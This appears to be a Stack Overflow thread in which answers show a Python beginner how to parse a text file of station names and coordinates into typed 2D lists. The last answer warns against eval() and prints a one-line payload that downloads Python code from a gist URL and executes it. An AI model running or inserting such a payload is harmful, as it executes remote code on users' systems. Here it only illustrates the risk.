I am quite new to programming. I want to read a data file and store it as a 2D array in Python 3 so that I can operate on the individual elements. I am using the following method to read in the file:

with open("text.txt", "r") as text:
    lines = [line.split() for line in text]

This however parses everything as text. How can I read in a file whilst maintaining the data types (text parsing as text, ints as ints and floats as floats, etc)? The input file looks something like this:

HNUS 4973168.840 1734085.512 -3585434.051
PRET 5064032.237 2724721.031 -2752950.762
RBAY 4739765.776 2970758.460 -3054077.535
TDOU 5064840.815 2969624.535 -2485109.939
ULDI 4796680.897 2930311.589 -3005435.714
  • Can't you do it after? (transforming strings in `str` or float)? – Clodion Jul 27 '15 at 09:51
  • [Method for guessing type of data represented currently represented as strings in python](http://stackoverflow.com/questions/3098337/method-for-guessing-type-of-data-represented-currently-represented-as-strings-in) – Delgan Jul 27 '15 at 09:51

2 Answers

1

Is this what you want?

import ast
with open("1.txt","r") as inp:
    c = [a if a.isalpha() else ast.literal_eval(a.strip()) for line in inp for a in line.split()]

output:

print(c)
['HNUS', 4973168.84, 1734085.512, -3585434.051, 'PRET', 5064032.237, 2724721.031, -2752950.762, 'RBAY', 4739765.776, 2970758.46, -3054077.535, 'TDOU', 5064840.815, 2969624.535, -2485109.939, 'ULDI', 4796680.897, 2930311.589, -3005435.714]
print(c[1], type(c[1]))
4973168.84 <class 'float'>

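You cannot apply ast.literal_eval() directly to the text cells, because it parses its argument as a Python literal and an unquoted word is not a valid literal. The word has to carry its own quotes inside the string.

For example: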

ast.literal_eval("as")
File "<unknown>", line 1
    as
    ^
SyntaxError: unexpected EOF while parsing


ast.literal_eval('"as"')
'as'
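
One way to avoid checking `isalpha()` up front is to try `ast.literal_eval` first and fall back to the raw string when the token is not a valid literal. The sketch below assumes a hypothetical helper named `parse_cell`, which is not part of the code above:

```python
import ast

def parse_cell(token):
    """Return the Python literal that `token` spells, or `token` itself.

    `parse_cell` is a hypothetical helper name used only for illustration.
    """
    try:
        return ast.literal_eval(token)
    except (ValueError, SyntaxError):
        # Bare words such as "HNUS" or "as" are not literals, so keep them as text.
        return token

row = [parse_cell(tok) for tok in "HNUS 4973168.840 1734085.512 -3585434.051".split()]
```

Note that with this approach a cell spelled `None` or `True` would come back as the corresponding Python object rather than as text, which may or may not be what you want.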

Edit:

To get it as a 2-d array:

import ast
with open("1.txt","r") as inp:
    c = [[a if a.isalpha() else ast.literal_eval(a.strip()) for a in line.split()] for line in inp]

output:

print(c)
[['HNUS', 4973168.84, 1734085.512, -3585434.051], ['PRET', 5064032.237, 2724721.031, -2752950.762], ['RBAY', 4739765.776, 2970758.46, -3054077.535], ['TDOU', 5064840.815, 2969624.535, -2485109.939], ['ULDI', 4796680.897, 2930311.589, -3005435.714]]
The6thSense
1

Usually, you should expect a specific data type for each row, column, or cell. In your case, that means a string in the first cell of every row and numbers in all the other cells.

data = []
with open('text.txt', 'r') as fp:
  for line in (l.split() for l in fp):
    line[1:] = [float(x) for x in line[1:]]
    data.append(line)
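
The same idea extends to any fixed layout. A minimal sketch, assuming a hypothetical `COLUMN_TYPES` tuple that names one converter per column (both that name and the helper `parse_line` are illustrative only), and using two lines of the question's data as an in-memory sample:

```python
# One converter per column: a name followed by three numbers (layout assumed
# from the sample data in the question).
COLUMN_TYPES = (str, float, float, float)

def parse_line(line):
    """Split a line on whitespace and convert each cell with its column's type."""
    cells = line.split()
    if len(cells) != len(COLUMN_TYPES):
        raise ValueError(f"expected {len(COLUMN_TYPES)} cells, got {len(cells)}")
    return [convert(cell) for convert, cell in zip(COLUMN_TYPES, cells)]

sample = [
    "HNUS 4973168.840 1734085.512 -3585434.051",
    "PRET 5064032.237 2724721.031 -2752950.762",
]
data = [parse_line(line) for line in sample]
```

Failing loudly on a malformed row is a design choice here; it tends to surface bad input earlier than silently keeping a string where a number was expected.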

If you really just want to convert every cell to the nearest applicable data type, you could use a function like this and apply it to every cell in the 2D list.

def nearest_applicable_conversion(x):
  try:
    return int(x)
  except ValueError:
    pass
  try:
    return float(x)
  except ValueError:
    pass
  return x
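
Applied to every cell of the 2D list, that might look like the sketch below. It repeats the function in a slightly more compact form so the block runs on its own, and it reads from an in-memory sample instead of `text.txt`. The names `sample` and `data` are illustrative, and the `DEMO` row is made up to show the int case.

```python
def nearest_applicable_conversion(x):
    # Try the narrowest type first: int, then float, else leave the string alone.
    for convert in (int, float):
        try:
            return convert(x)
        except ValueError:
            pass
    return x

# First line comes from the question; the second is a made-up row with ints.
sample = """HNUS 4973168.840 1734085.512 -3585434.051
DEMO 42 1.5 -3"""

data = [[nearest_applicable_conversion(cell) for cell in line.split()]
        for line in sample.splitlines()]
```

One caveat worth knowing: `float()` also accepts spellings such as `nan` and `inf`, so a text cell with one of those values would be converted to a float.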

I strongly discourage using eval(), as it will evaluate any valid Python expression and leaves your system open to attack by anyone who knows how to exploit it. I could easily execute arbitrary code by putting the following into one of the cells that you eval() from text.txt; I just have to make sure it contains no whitespace, as that would split the code across multiple cells:

(lambda:(eval(compile(__import__('urllib.request').request.urlopen('https://gist.githubusercontent.com/NiklasRosenstein/470377b7ceef98ef6b87/raw/06593a30d5b00ca506b536315ac79f7b950a5163/jagged.py').read().decode(),'<string>','exec'),globals())))()
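
For comparison, `ast.literal_eval` only accepts literals (numbers, strings, tuples, lists, dicts, sets, booleans and `None`) and refuses anything involving a function call. A small sketch using a harmless stand-in payload, which is an assumption for illustration and not the code above:

```python
import ast

# Harmless stand-in for a malicious cell; like the real thing, it has no whitespace.
payload = "__import__('os').getcwd()"

try:
    ast.literal_eval(payload)
    rejected = False
except ValueError:
    # literal_eval refuses call expressions instead of running them.
    rejected = True
```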
Niklas R